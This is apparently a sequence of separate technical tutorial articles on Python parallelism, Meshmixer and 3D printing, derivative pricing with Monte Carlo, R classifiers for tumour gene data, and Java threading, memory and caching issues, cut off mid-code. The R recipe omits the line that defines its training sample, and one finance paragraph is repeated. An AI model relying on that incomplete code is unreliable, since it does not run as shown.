- The number of worker processes can be changed during runtime
- Dynamic load balancing
- Fault tolerance
- Auto-discovery of computational resources

Celery – a distributed task queue

Celery is an excellent Python module that's used to create distributed systems and has excellent documentation. It makes use of at least three different approaches to run tasks concurrently—multiprocessing, Eventlet, and Gevent. This work will, however, concentrate on the multiprocessing approach. Switching from one approach to another is a configuration matter, and it is left as a study point so that the reader is able to make comparisons with his/her own experiments. The Celery module can be obtained from the official project page at http://celeryproject.org.

Summary

In this article, we had a short introduction to some Python modules, built-in and external, which make a developer's life easier when building parallel systems.

Resources for Article:

Further resources on this subject:
- Getting Started with Spring Python [Article]
- Python Testing: Installing the Robot Framework [Article]
- Getting Up and Running with MySQL for Python [Article]
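As a small appendix to this overview, the following minimal sketch contrasts the two standard-library approaches described above (threading and multiprocessing) on the same task. It is not taken from the article; the worker function, worker count, and iteration count are arbitrary choices for illustration only.

    import threading
    import multiprocessing

    def count_down(n):
        # A CPU-bound busy loop, used only to give each worker some work.
        while n > 0:
            n -= 1

    def run_with_threads(workers=4, n=5000000):
        # threading: all workers share one process, so CPU-bound work is
        # serialized by the GIL even though the threads run concurrently.
        threads = [threading.Thread(target=count_down, args=(n,))
                   for _ in range(workers)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()

    def run_with_processes(workers=4, n=5000000):
        # multiprocessing: the same pattern, but each worker is a separate
        # process with its own interpreter, so the work can use several cores.
        processes = [multiprocessing.Process(target=count_down, args=(n,))
                     for _ in range(workers)]
        for p in processes:
            p.start()
        for p in processes:
            p.join()

    if __name__ == '__main__':
        # The __main__ guard is required for multiprocessing on some platforms.
        run_with_threads()
        run_with_processes()

Timing the two calls (for example, with time.time()) on a multicore machine is a simple way to observe the practical difference between the two modules for CPU-bound work.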


Shaping a model with Meshmixer and printing it

Packt
20 Jun 2014
4 min read
Shaping with Meshmixer

Meshmixer was designed to provide a modeling interface that frees the user from working directly with the geometry of the mesh. In most cases, the intent of the program succeeds, but in some cases, it's good to see how the underlying mesh works. We'll use some brush tools to make our model better, taking a look at how this affects the mesh structure.

Getting ready

We'll use a toy block scanned with 123D Catch.

How to do it...

We will proceed as follows:

1. Let's take a look at the model's mesh by positioning the model with a large surface visible. Go to the menu and select View. Scroll down and select Toggle Wireframe (W).
2. Choose Sculpt. From the pop-up toolbox, choose Brushes. Go to the menu and select ShrinkSmooth. Adjust your settings in the Properties section. Keep the size as 60 and the strength as 25.
3. Use the smooth tool slowly across the model, watching the change it makes to the mesh. In the following example, the keyboard shortcut W is used to toggle between mesh views.
4. Repeat using the RobustSmooth and Flatten brushes. Use this combination of brushes to flatten one side of the toy block.
5. Rotate your model to an area where there's heavy distortion. Make sure your view is in the wireframe mode.
6. Go back to Brushes and select Pinch. Adjust the Strength to 85, Size to 39, Depth to -17, and Lazyness to 95. Keep everything else at the default values. If you are uncertain of the default values, left-click on the small cogwheel icon next to the Properties heading and choose Reset to Defaults.
7. We're going to draw a line across a distorted area of the toy block to see how it affects the mesh. Using the pinch brush, draw a line across the model.
8. Save your work and then select Undo/back from the Actions menu (Ctrl + Z).
9. Now, select your entire model. Go to the toolbox and select Edit. Scroll down and select Remesh (R). You'll see an even distribution of polygons in the mesh. Keep the defaults in the pop up and click on Accept.
10. Now, go back and choose Clear Selection. Select the pinch brush again and draw a line across the model as you did before. Compare it to the other model with the unrefined mesh.
11. Let's finish cleaning up the toy block. Click on Undo/back (Ctrl + Z) to remove the pinch brush line that you drew.
12. Now, use the pinch tool to refine the edges of the model. Work around it and sharpen all the edges. Finish smoothing the planes on the block and click on Save.

We can see the results clearly as we compare the original toy block model to our modified model in the preceding image.

How it works...

Meshmixer works by using a mesh with a high density of polygons. When a sculpting brush such as pinch is used to manipulate the surface, it rapidly increases the polygon count in the surrounding area. When the pinch tool crosses an area that has fewer and larger polygons, the interpolation of the area becomes distorted. We can see this in the following example when we compare the original and remeshed model in the wireframe view.

In the following image, when we hide the wireframe, we can see how the distortion in the mesh has given the model on the left some undesirable texture along the pinch line.

It may be a good idea to examine a model's mesh before sculpting it. Meshmixer works better with a dense polygon count that is consistent in size. By using the Remesh edit, a variety of mesh densities can be achieved by making changes in Properties.
Experiment with the various settings and the sculpting brushes while in the wireframe view. This will help you gain a better understanding of how mesh surface modeling works.

Let's print!

When we 3D print a model, we have the option of controlling how solid the interior will be and what kind of structure will fill it. How we choose between the options is easily determined by answering the following questions:

- Will it need to be structurally strong? If it's going to be used as a mechanical part or an item that will be heavily handled, then it does.
- Will it be a prototype? If it's a temporary object for examination purposes or strictly for display, then a fragile form may suffice.

Depending on the use of a model, you'll have to decide where the object falls between these two extremes.


What is Quantitative Finance?

Packt
20 Jun 2014
11 min read
Discipline 1 – finance (financial derivatives)

In general, a financial derivative is a contract between two parties who agree to exchange one or more cash flows in the future. The value of these cash flows depends on some future event, for example, the value of some stock index or interest rate being above or below some predefined level. The activation or triggering of this future event thus depends on the behavior of a variable quantity known as the underlying. Financial derivatives receive their name because they derive their value from the behavior of another financial instrument. As such, financial derivatives do not have an intrinsic value in themselves (in contrast to bonds or stocks); their price depends entirely on the underlying.

A critical feature of derivative contracts is thus that their future cash flows are probabilistic and not deterministic. The future cash flows in a derivative contract are contingent on some future event. That is why derivatives are also known as contingent claims. This feature makes these types of contracts difficult to price. The following are the most common types of financial derivatives:

- Futures
- Forwards
- Options
- Swaps

Futures and forwards are financial contracts between two parties. One party agrees to buy the underlying from the other party at some predetermined date (the maturity date) for some predetermined price (the delivery price). An example could be a one-month forward contract on one ounce of silver. The underlying is the price of one ounce of silver. No exchange of cash flows occurs at inception (today, t=0); it occurs only at maturity (t=T). Here, t represents the variable time. Forwards are contracts negotiated privately between two parties (in other words, Over The Counter (OTC)), while futures are negotiated at an exchange.

Options are financial contracts between two parties. One party (called the holder of the option) pays a premium to the other party (called the writer of the option) in order to have the right, but not the obligation, to buy some particular asset (the underlying) for some particular price (the strike price) at some particular date in the future (the maturity date). This type of contract is called a European Call contract.

Example 1

Consider a one-month call contract on the S&P 500 index. The underlying in this case will be the value of the S&P 500 index. There are cash flows both at inception (today, t=0) and at maturity (t=T). At inception (t=0), the premium is paid, while at maturity (t=T), the holder of the option will choose between the following two possible scenarios, depending on the value of the underlying at maturity S(T):

- Scenario A: Exercise his/her right and buy the underlying asset for K
- Scenario B: Do nothing

The option holder will choose Scenario A if the value of the underlying at maturity is above the value of the strike, that is, S(T)>K. This will guarantee him/her a profit of S(T)-K. The option holder will choose Scenario B if the value of the underlying at maturity is below the value of the strike, that is, S(T)<K. This will guarantee that his/her losses are limited to zero.

Example 2

An Interest Rate Swap (IRS) is a financial contract between two parties A and B who agree to exchange cash flows at regular intervals during a given period of time (the life of the contract).
Example 2

An Interest Rate Swap (IRS) is a financial contract between two parties A and B who agree to exchange cash flows at regular intervals during a given period of time (the life of the contract). Typically, the cash flows from A to B are indexed to a fixed rate of interest, while the cash flows from B to A are indexed to a floating interest rate. The set of fixed cash flows is known as the fixed leg, while the set of floating cash flows is known as the floating leg. The cash flows occur at regular intervals during the life of the contract between inception (t=0) and maturity (t=T). An example could be a fixed-for-floating IRS in which party A pays a fixed rate of 5 percent on the agreed notional N every three months and receives EURIBOR3M on the agreed notional N every three months.

Example 3

A futures contract on a stock index also involves a single future cash flow (the delivery price) to be paid at the maturity of the contract. However, the payoff in this case is uncertain, because how much profit I will get from this operation will depend on the value of the underlying at maturity. If the price of the underlying is above the delivery price, then the payoff I get (denoted by the function H) is positive (indicating a profit) and corresponds to the difference between the value of the underlying at maturity S(T) and the delivery price K. If the price of the underlying is below the delivery price, then the payoff I get is negative (indicating a loss) and corresponds to the difference between the delivery price K and the value of the underlying at maturity S(T). This characteristic can be summarized in the following payoff formula:

Equation 1: H(S(T)) = S(T) - K

Here, H(S(T)) is the payoff at maturity, which is a function of S(T).

Financial derivatives are very important to the modern financial markets. According to the Bank of International Settlements (BIS), as of December 2012, the amounts outstanding for OTC derivative contracts worldwide were as follows:

Foreign exchange derivatives: 67,358 billion USD
Interest rate derivatives: 489,703 billion USD
Equity-linked derivatives: 6,251 billion USD
Commodity derivatives: 2,587 billion USD
Credit default swaps: 25,069 billion USD

For more information, see http://www.bis.org/statistics/dt1920a.pdf.

Discipline 2 – mathematics

We need mathematical models to capture both the future evolution of the underlying and the probabilistic nature of the contingent cash flows we encounter in financial derivatives. Regarding the contingent cash flows, these can be represented in terms of the payoff function H(S(T)) for the specific derivative we are considering. Because S(T) is a stochastic variable, the value of H(S(T)) ought to be computed as an expectation E[H(S(T))]. In order to compute this expectation, we need techniques that allow us to predict or simulate the behavior of the underlying S(T) into the future, so as to be able to compute the value of S(T) and finally the mean value of the payoff E[H(S(T))].

Regarding the behavior of the underlying, typically this is formalized using Stochastic Differential Equations (SDEs), such as Geometric Brownian Motion (GBM), as follows:

Equation 2: dS = μS dt + σS dW

The previous equation fundamentally says that the change in the stock price (dS) can be understood as the sum of two effects: a deterministic effect (the first term on the right-hand side) and a stochastic effect (the second term on the right-hand side). The parameter μ is called the drift, and the parameter σ is called the volatility. S is the stock price, dt is a small time interval, and dW is an increment in the Wiener process. This is the most common model used to describe the behavior of stocks, commodities, and foreign exchange.
Other models exist, such as jump, local volatility, and stochastic volatility models, that enhance the description of the dynamics of the underlying. Regarding the numerical methods, these correspond to ways in which the formal expression described in the mathematical model (usually in continuous time) is transformed into an approximate representation that can be used for calculation (usually in discrete time). This means that the SDE that describes the evolution of the price of some stock index into the future, such as the FTSE 100, is changed to describe the evolution at discrete intervals. An approximate representation of an SDE can be calculated using the Euler approximation as follows:

Equation 3: S(t+Δt) = S(t) + μS(t)Δt + σS(t)√Δt Z

Here, Δt is the length of one time step and Z is a draw from the standard normal distribution. The preceding equation needs to be solved in an iterative way for each time interval between now and the maturity of the contract. If these time intervals are days and the contract has a maturity of 30 days from now, then we compute tomorrow's price in terms of today's. Then we compute the price of the day after tomorrow as a function of tomorrow's price, and so on. In order to price the derivative, we need to compute the expected payoff E[H(S(T))] at maturity and then discount it to the present. In this way, we are able to compute the fair premium associated with a European option contract with the help of the following equation:

Equation 4: premium = exp(-rT) E[H(S(T))], where r is the risk-free discount rate

Discipline 3 – informatics (C++ programming)

What is the role of C++ in pricing derivatives? Its role is fundamental. It allows us to implement the actual calculations that are required in order to solve the pricing problem. Using the preceding techniques to describe the dynamics of the underlying, we need to simulate many potential future scenarios describing its evolution. Say we need to price a futures contract on the EUR/USD exchange rate with a one-year maturity. We have to simulate the future evolution of EUR/USD for each day of the next year (using Equation 3). We can then compute the payoff at maturity (using Equation 1). However, in order to compute the expected payoff (using Equation 4), we need to simulate thousands of such possible evolutions via a technique known as Monte Carlo simulation.

The set of steps required to complete this process is known as an algorithm. To price a derivative, we have to construct such an algorithm and then implement it in an advanced programming language such as C++. Of course, C++ is not the only possible choice; other languages include Java, VBA, C#, MathWorks MATLAB, and Wolfram Mathematica. However, C++ is an industry standard because it is flexible, fast, and portable. Also, through the years, several numerical libraries have been created to conduct complex numerical calculations in C++. Finally, C++ is a powerful, modern, object-oriented language.

It is always difficult to strike a balance between clarity and efficiency. We have aimed at making computer programs that are self-contained (not too object oriented) and self-explanatory. More advanced implementations are certainly possible, particularly in the context of larger financial pricing libraries in a corporate context. In this article, all the programs are implemented with the newest standard, C++11, using Code::Blocks (http://www.codeblocks.org) and MinGW (http://www.mingw.org).
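Putting Equations 1, 3, and 4 together, the Monte Carlo estimate of the price can be written compactly as follows (this summary formula is an addition for clarity; N denotes the number of simulated paths, a symbol not used in the original text):

premium ≈ exp(-rT) × (1/N) × Σ H(S_i(T)), for i = 1, ..., N

Here, S_i(T) is the simulated value of the underlying at maturity along the i-th path generated with Equation 3.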
The Bento Box template

A Bento Box is a single-portion takeaway meal common in Japanese cuisine. Usually, it has a rectangular form that is internally divided into compartments to accommodate the various portions that constitute a meal. In this article, we use the metaphor of the Bento Box to describe a visual template that facilitates, organizes, and structures the solution of derivative pricing problems. The Bento Box template is simply a form that we will fill sequentially with the different elements that we require to price derivatives in a logical, structured manner. When used to price a particular derivative, the template is divided into four areas or boxes, each containing information critical for the solution of the problem. The following figure illustrates a generic template applicable to all derivatives:

The Bento Box template – general case

The following figure shows an example of the Bento Box template as applied to a simple European Call option:

The Bento Box template – European Call option

In the preceding figure, we have filled the various compartments, starting in the top-left box and proceeding clockwise. Each compartment contains the details of our specific problem, taking us in sequence from the conceptual (box 1: derivative contract) to the practical (box 4: algorithm), passing through the quantitative aspects required for the solution (box 2: mathematical model and box 3: numerical method).

Summary

This article gave an overview of the main elements of Quantitative Finance as applied to pricing financial derivatives. The Bento Box template technique will be used to organize our approach to solving problems in pricing financial derivatives. We will assume that we are in possession of enough information to fill box 1 (derivative contract).

Resources for Article:

Further resources on this subject:
Application Development in Visual C++ - The Tetris Application [article]
Getting Started with Code::Blocks [article]
Creating and Utilizing Custom Entities [article]

Machine Learning in Bioinformatics

Packt
20 Jun 2014
8 min read
(For more resources related to this topic, see here.) Supervised learning for classification Like clustering, classification is also about categorizing data instances, but in this case, the categories are known and are termed as class labels. Thus, it aims at identifying the category that a new data point belongs to. It uses a dataset where the class labels are known to find the pattern. Classification is an instance of supervised learning where the learning algorithm takes a known set of input data and corresponding responses called class labels and builds a predictor model that generates reasonable predictions for the class labels in the unknown data. To illustrate, let's imagine that we have gene expression data from cancer patients as well as healthy patients. The gene expression pattern in these samples can define whether the patient has cancer or not. In this case, if we have a set of samples for which we know the type of tumor, the data can be used to learn a model that can identify the type of tumor. In simple terms, it is a predictive function used to determine the tumor type. Later, this model can be applied to predict the type of tumor in unknown cases. There are some do's and don'ts to keep in mind while learning a classifier. You need to make sure that you have enough data to learn the model. Learning with smaller datasets will not allow the model to learn the pattern in an unbiased manner and again, you will end up with an inaccurate classification. Furthermore, the preprocessing steps (such as normalization) for the training and test data should be the same. Another important thing that one should take care of is to keep the training and test data distinct. Learning on the entire data and then using a part of this data for testing will lead to a phenomenon called over fitting. It is always recommended that you take a look at it manually and understand the question that you need to answer via your classifier. There are several methods of classification. In this recipe, we will talk about some of these methods. We will discuss linear discriminant analysis (LDA), decision tree (DT), and support vector machine (SVM). Getting ready To perform the classification task, we need two preparations. First, a dataset with known class labels (training set), and second, the test data that the classifier has to be tested on (test set). Besides this, we will use some R packages, which will be discussed when required. As a dataset, we will use approximately 2300 gene from tumor cells. The data has ~83 data points with four different types of tumors. These will be used as our class labels. We will use 60 of the data points for the training and the remaining 23 for the test. To find out more about the dataset, refer to the Classification and diagnostic prediction of cancers using gene expression profiling and artificial neural networks article by Khan and others (http://research.nhgri.nih.gov/microarray/Supplement/). The set has been precompiled in a format that is readily usable in R and is available on the book's web page (code files) under the name cancer.rda. How to do it… To classify data points based on their features, perform the following steps: First, load the following MASS library as it has some of the classification functions: > library(MASS) Now, you need your data to learn and test the classifiers. 
Load the data from the code files available on the book's web page (cancer.rda) as follows: > load ("path/to/code/directory/cancer.rda") # located in the code file directory for the chapter, assign the path accordingly Randomly sample 60 data points for the training and the remaining 23 for the test set as follows—ensure that these two datasets do not overlap and are not biased towards any specific tumor type (random sampling): > train <- mldata[train_row,] # use sampled indexes to extract training data > test <- mldata[-train_row,] # test set is select by selecting all the other data points For the training data, retain the class labels, which are the tumor columns here, and remove this information from the test data. However, store this information for comparison purposes: > testClass <- test$tumor > test$tumor <- NULL Now, try the linear discriminate analysis classifier, as follows, to get the classifier model: > myLD <- lda(tumor ~ ., train) # might issue a warning Test this classifier to predict the labels on your test set, as follows: > testRes_lda <- predict(myLD, test) To check the number of correct and incorrect predictions, simply compare the predicted classes with the testClass object, which was created in step 4, as follows: > sum(testRes_lda$class == testClass) # correct prediction [1] 19 > sum(testRes_lda$class != testClass) # incorrect prediction [1] 4 Now, try another simple classifier called DT. For this, you need the rpart package: > library(rpart) Create the decision tree based on your training data, as follows: > myDT <- rpart(tumor~ ., data = train, control = rpart.control(minsplit = 10)) Plot your tree by typing the following commands, as shown in the next diagram: > plot(myDT) > text(myDT, use.n=T) The following screenshot shows the cut off for each feature (represented by the branches) to differentiate between the classes: The tree for DT-based learning Now, test the decision tree classifier on your test data using the following prediction function: > testRes_dt <- predict(myDT, newdata= test) Take a look at the species that each data instance is put in by the predicted classifier, as follows (1 if predicted in the class, else 0): > classes <- round(testRes_dt) > head(classes) BL EW NB RM 4 0 0 0 1 10 0 0 0 1 15 1 0 0 0 16 0 0 1 0 18 0 1 0 0 21 0 1 0 0 Finally, you'll work with SVMs. To be able to use them, you need another R package named e1071 as follows: > library(e1071) Create the svm classifier from the training data as follows: > mySVM <- svm(tumor ~ ., data = train) Then, use your classifier, the model (mySVM object) learned to predict for the test data. You will see the predicted labels for each instance as follows: > testRes_svm <- predict(mySVM, test) > testRes_svm How it works… We started our recipe by loading the input data on tumors. The supervised learning methods we saw in the recipe used two datasets: the training set and test set. The training set carries the class label information. The first part in most of the learning methods shown here, the training set is used to identify a pattern and model the pattern to find a distinction between the classes. This model is then applied on the test set that does not have the class label data to predict the class labels. To identify the training and test sets, we first randomly sample 60 indexes out of the entire data and use the remaining 23 for testing purposes. The supervised learning methods explained in this recipe follow a different principle. 
LDA attempts to model the difference between classes based on the linear combination of its features. This combination function forms the model based on the training set and is used to predict the classes in the test set. The LDA model trained on 60 samples is then used to predict for the remaining 23 cases. DT is, however, a different method. It forms regression trees that form a set of rules to distinguish one class from the other. The tree learned on a training set is applied to predict classes in test sets or other similar datasets. SVM is a relatively complex technique of classification. It aims to create a hyperplane(s) in the feature space, making the data points separable along these planes. This is done on a training set and is then used to assign classes to new data points. In general, LDA uses linear combination and SVM uses multiple dimensions as the hyperplane for data distinction. In this recipe, we used the svm functionality from the e1071 package, which has many other utilities for learning. We can compare the results obtained by the models we used in this recipe (they can be computed using the provided code on the book's web page). There's more... One of the most popular classifier tools in the machine learning community is WEKA. It is a Java-based tool and implements many libraries to perform classification tasks using DT, LDA, Random Forest, and so on. R supports an interface to the WEKA with a library named RWeka. It is available on the CRAN repository at http://cran.r-project.org/web/packages/RWeka/ . It uses RWekajars, a separate package, to use the Java libraries in it that implement different classifiers. See also The Elements of Statistical Learning book by Hastie, Tibshirani, and Friedman at http://statweb.stanford.edu/~tibs/ElemStatLearn/printings/ESLII_print10.pdf, which provides more information on LDA, DT, and SVM

Common performance issues

Packt
19 Jun 2014
16 min read
(For more resources related to this topic, see here.)

Threading performance issues

Threading performance issues are the issues related to concurrency, as follows:

Lack of threading or excessive threading
Threads blocking up to starvation (usually from competing on shared resources)
Deadlock until the complete application hangs (threads waiting for each other)

Memory performance issues

Memory performance issues are the issues that are related to application memory management, as follows:

Memory leakage: This issue is an explicit leakage or implicit leakage, as seen in improper hashing
Improper caching: This issue is due to over caching, inadequate size of the object, or missing essential caching
Insufficient memory allocation: This issue is due to missing JVM memory tuning

Algorithmic performance issues

Implementing the application logic requires two important, related qualities: correctness and optimization. If the logic is not optimized, we have algorithmic issues, as follows:

Costly algorithmic logic
Unnecessary logic

Work as designed performance issues

The work as designed performance issue is a group of issues related to the application design. The application behaves exactly as designed, but if the design has issues, it will lead to performance issues. Some examples of these issues are as follows:

Using synchronous calls when asynchronous calls should be used
Neglecting remoteness, that is, using remote calls as if they were local calls
Improper loading technique, that is, eager versus lazy loading techniques
Selection of the size of the object
Excessive serialization layers
Web services granularity
Too much synchronization
Non-scalable architecture, especially in the integration layer or middleware
Saturated hardware on a shared infrastructure

Interfacing performance issues

Whenever the application is dealing with resources, we may face the following interfacing issues that could impact our application performance:

Using an old driver/library
Missing frequent database housekeeping
Database issues, such as missing database indexes
Low-performing JMS or integration service bus
Logging issues (excessive logging or not following logging best practices)
Network component issues, that is, load balancer, proxy, firewall, and so on

Miscellaneous performance issues

Miscellaneous performance issues include different performance issues, as follows:

Inconsistent performance of application components, for example, slow components can cause the whole application to slow down
Introduced performance issues that delay the processing speed
Improper configuration tuning of different components, for example, JVM, application server, and so on
Application-specific performance issues, such as excessive validations or applying many business rules

Fake performance issues

Fake performance issues could be temporary issues or not issues at all. The famous examples are as follows:

Temporary networking issues
Scheduled running jobs (detected from the associated pattern)
Software automatic updates (these must be disabled in production)
Non-reproducible issues

In the following sections, we will go through some of the listed issues.

Threading performance issues

Multithreading has the advantage of maximizing hardware utilization. In particular, it maximizes the processing power by executing multiple tasks concurrently. But it has different side effects, especially if not used wisely inside the application.
For example, in order to distribute tasks among different concurrent threads, there should be no or minimal data dependency, so each thread can complete its task without waiting for other threads to finish. Also, they shouldn't compete over different shared resources or they will be blocked, waiting for each other. We will discuss some of the common threading issues in the next section. Blocking threads A common issue where threads are blocked is waiting to obtain the monitor(s) of certain shared resources (objects), that is, holding by other threads. If most of the application server threads are consumed in a certain blocked status, the application becomes gradually unresponsive to user requests. In the Weblogic application server, if a thread keeps executing for more than a configurable period of time (not idle), it gets promoted to the Stuck thread. The more the threads are in the stuck status, the more the server status becomes critical. Configuring the stuck thread parameters is part of the Weblogic performance tuning. Performance symptoms The following symptoms are the performance symptoms that usually appear in cases of thread blocking: Slow application response (increased single request latency and pending user requests) Application server logs might show some stuck threads. The server's healthy status becomes critical on monitoring tools (application server console or different monitoring tools) Frequent application server restarts either manually or automatically Thread dump shows a lot of threads in the blocked status waiting for different resources Application profiling shows a lot of thread blocking An example of thread blocking To understand the effect of thread blocking on application execution, open the HighCPU project and measure the time it takes for execution by adding the following additional lines: long start= new Date().getTime(); .. .. long duration= new Date().getTime()-start; System.err.println("total time = "+duration); Now, try to execute the code with a different number of the thread pool size. We can try using the thread pool size as 50 and 5, and compare the results. In our results, the execution of the application with 5 threads is much faster than 50 threads! Let's now compare the NetBeans profiling results of both the executions to understand the reason behind this unexpected difference. The following screenshot shows the profiling of 50 threads; we can see a lot of blocking for the monitor in the column and the percentage of Monitor to the left waiting around at 75 percent: To get the preceding profiling screen, click on the Profile menu inside NetBeans, and then click on Profile Project (HighCPU). From the pop-up options, select Monitor and check all the available options, and then click on Run. The following screenshot shows the profiling of 5 threads, where there is almost no blocking, that is, less threads compete on these resources: Try to remove the System.out statement from inside the run() method, re-execute the tests, and compare the results. Another factor that also affects the selection of the pool size, especially when the thread execution takes long time, is the context switching overhead. This overhead requires the selection of the optimal pool size, usually related to the number of available processors for our application. Context switching is the CPU switching from one process (or thread) to another, which requires restoration of the execution data (different CPU registers and program counters). 
The context switching includes suspension of the current executing process, storing its current data, picking up the next process for execution according to its priority, and restoring its data. Although it's supported on the hardware level and is faster, most operating systems do this on the level of software context switching to improve the performance. The main reason behind this is the ability of the software context switching to selectively choose the required registers to save. Thread deadlock When many threads hold the monitor for objects that they need, this will result in a deadlock unless the implementation uses the new explicit Lock interface. In the example, we had a deadlock caused by two different threads waiting to obtain the monitor that the other thread held. The thread profiling will show these threads in a continuous blocking status, waiting for the monitors. All threads that go into the deadlock status become out of service for the user's requests, as shown in the following screenshot: Usually, this happens if the order of obtaining the locks is not planned. For example, if we need to have a quick and easy fix for a multidirectional thread deadlock, we can always lock the smallest or the largest bank account first, regardless of the transfer direction. This will prevent any deadlock from happening in our simple two-threaded mode. But if we have more threads, we need to have a much more mature way to handle this by using the Lock interface or some other technique. Memory performance issues In spite of all this great effort put into the allocated and free memory in an optimized way, we still see memory issues in Java Enterprise applications mainly due to the way people are dealing with memory in these applications. We will discuss mainly three types of memory issues: memory leakage, memory allocation, and application data caching. Memory leakage Memory leakage is a common performance issue where the garbage collector is not at fault; it is mainly the design/coding issues where the object is no longer required but it remains referenced in the heap, so the garbage collector can't reclaim its space. If this is repeated with different objects over a long period (according to object size and involved scenarios), it may lead to an out of memory error. The most common example of memory leakage is adding objects to the static collections (or an instance collection of long living objects, such as a servlet) and forgetting to clean collections totally or partially. Performance symptoms The following symptoms are some of the expected performance symptoms during a memory leakage in our application: The application uses heap memory increased by time The response slows down gradually due to memory congestion OutOfMemoryError occurs frequently in the logs and sometimes an application server restart is required Aggressive execution of garbage collection activities Heap dump shows a lot of objects retained (from the leakage types) A sudden increase of memory paging as reported by the operating system monitoring tools An example of memory leakage We have a sample application ExampleTwo; this is a product catalog where users can select products and add them to the basket. The application is written in spaghetti code, so it has a lot of issues, including bad design, improper object scopes, bad caching, and memory leakage. 
The following screenshot shows the product catalog browser page: One of the bad issues is the usage of the servlet instance (or static members), as it causes a lot of issues in multiple threads and has a common location for unnoticed memory leakages. We have added the following instance variable as a leakage location: private final HashMap<String, HashMap> cachingAllUsersCollection = new HashMap(); We will add some collections to the preceding code to cause memory leakage. We also used the caching in the session scope, which causes implicit leakage. The session scope leakage is difficult to diagnose, as it follows the session life cycle. Once the session is destroyed, the leakage stops, so we can say it is less severe but more difficult to catch. Adding global elements, such as a catalog or stock levels, to the session scope has no meaning. The session scope should only be restricted to the user-specific data. Also, forgetting to remove data that is not required from a session makes the memory utilization worse. Refer to the following code: @Stateful public class CacheSessionBean Instead of using a singleton class here or stateless bean with a static member, we used the Stateful bean, so it is instantiated per user session. We used JPA beans in the application layers instead of using View Objects. We also used loops over collections instead of querying or retrieving the required object directly, and so on. It would be good to troubleshoot this application with different profiling aspects to fix all these issues. All these factors are enough to describe such a project as spaghetti. We can use our knowledge in Apache JMeter to develop simple testing scenarios. As shown in the following screenshot, the scenario consists of catalog navigations and details of adding some products to the basket: Executing the test plan using many concurrent users over many iterations will show the bad behavior of our application, where the used memory is increased by time. There is no justification as the catalog is the same for all users and there's no specific user data, except for the IDs of the selected products. Actually, it needs to be saved inside the user session, which won't take any remarkable memory space. In our example, we intend to save a lot of objects in the session, implement a wrong session level, cache, and implement meaningless servlet level caching. All this will contribute to memory leakage. This gradual increase in the memory consumption is what we need to spot in our environment as early as possible (as we can see in the following screenshot, the memory consumption in our application is approaching 200 MB!): Improper data caching Caching is one of the critical components in the enterprise application architecture. It increases the application performance by decreasing the time required to query the object again from its data store, but it also complicates the application design and causes a lot of other secondary issues. The main concerns in the cache implementation are caching refresh rate, caching invalidation policy, data inconsistency in a distributed environment, locking issues while waiting to obtain the cached object's lock, and so on. Improper caching issue types The improper caching issue can take a lot of different variants. We will pick some of them and discuss them in the following sections. No caching (disabled caching) Disabled caching will definitely cause a big load over the interfacing resources (for example, database) by hitting it in with almost every interaction. 
This should be avoided while designing an enterprise application; otherwise; the application won't be usable. Fortunately, this has less impact than using wrong caching implementation! Most of the application components such as database, JPA, and application servers already have an out-of-the-box caching support. Too small caching size Too small caching size is a common performance issue, where the cache size is initially determined but doesn't get reviewed with the increase of the application data. The cache sizing is affected by many factors such as the memory size. If it allows more caching and the type of the data, lookup data should be cached entirely when possible, while transactional data shouldn't be cached unless required under a very strict locking mechanism. Also, the cache replacement policy and invalidation play an important role and should be tailored according to the application's needs, for example, least frequently used, least recently used, most frequently used, and so on. As a general rule, the bigger the cache size, the higher the cache hit rate and the lower the cache miss ratio. Also, the proper replacement policy contributes here; if we are working—as in our example—on an online product catalog, we may use the least recently used policy so all the old products will be removed, which makes sense as the users usually look for the new products. Monitoring of the caching utilization periodically is an essential proactive measure to catch any deviations early and adjust the cache size according to the monitoring results. For example, if the cache saturation is more than 90 percent and the missed cache ratio is high, a cache resizing is required. Missed cache hits are very costive as they hit the cache first and then the resource itself (for example, database) to get the required object, and then add this loaded object into the cache again by releasing another object (if the cache is 100 percent), according to the used cache replacement policy. Too big caching size Too big caching size might cause memory issues. If there is no control over the cache size and it keeps growing, and if it is a Java cache, the garbage collector will consume a lot of time trying to garbage collect that huge memory, aiming to free some memory. This will increase the garbage collection pause time and decrease the cache throughput. If the cache throughput is decreased, the latency to get objects from the cache will increase causing the cache retrieval cost to be high to the level it might be slower than hitting the actual resources (for example, database). Using the wrong caching policy Each application's cache implementation should be tailored according to the application's needs and data types (transactional versus lookup data). If the selection of the caching policy is wrong, the cache will affect the application performance rather than improving it. 
Performance symptoms According to the cache issue type and different cache configurations, we will see the following symptoms: Decreased cache hit rate (and increased cache missed ratio) Increased cache loading because of the improper size Increased cache latency with a huge caching size Spiky pattern in the performance testing response time, in case the cache size is not correct, causes continuous invalidation and reloading of the cached objects An example of improper caching techniques In our example, ExampleTwo, we have demonstrated many caching issues, such as no policy defined, global cache is wrong, local cache is improper, and no cache invalidation is implemented. So, we can have stale objects inside the cache. Cache invalidation is the process of refreshing or updating the existing object inside the cache or simply removing it from the cache. So in the next load, it reflects its recent values. This is to keep the cached objects always updated. Cache hit rate is the rate or ratio in which cache hits match (finds) the required cached object. It is the main measure for cache effectiveness together with the retrieval cost. Cache miss rate is the rate or ratio at which the cache hits the required object that is not found in the cache. Last access time is the timestamp of the last access (successful hit) to the cached objects. Caching replacement policies or algorithms are algorithms implemented by a cache to replace the existing cached objects with other new objects when there are no rooms available for any additional objects. This follows missed cache hits for these objects. Some examples of these policies are as follows: First-in-first-out (FIFO): In this policy, the cached object is aged and the oldest object is removed in favor of the new added ones. Least frequently used (LFU): In this policy, the cache picks the less frequently used object to free the memory, which means the cache will record statistics against each cached object. Least recently used (LRU): In this policy, the cache replaces the least recently accessed or used items; this means the cache will keep information like the last access time of all cached objects. Most recently used (MRU): This policy is the opposite of the previous one; it removes the most recently used items. This policy fits the application where items are no longer needed after the access, such as used exam vouchers. Aging policy: Every object in the cache will have an age limit, and once it exceeds this limit, it will be removed from the cache in the simple type. In the advanced type, it will also consider the invalidation of the cache according to predefined configuration rules, for example, every three hours, and so on. It is important for us to understand that caching is not our magic bullet and it has a lot of related issues and drawbacks. Sometimes, it causes overhead if not correctly tailored according to real application needs.
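To make the replacement policies listed above more concrete, here is a minimal sketch (not part of the original article) of a size-bounded LRU cache built on java.util.LinkedHashMap; the ProductCatalogCache name and the capacity of 2 are illustrative assumptions only:

import java.util.LinkedHashMap;
import java.util.Map;

// A size-bounded cache that evicts the least recently used entry once
// the configured capacity is exceeded (accessOrder=true enables LRU order).
public class ProductCatalogCache<K, V> extends LinkedHashMap<K, V> {

    private final int capacity;

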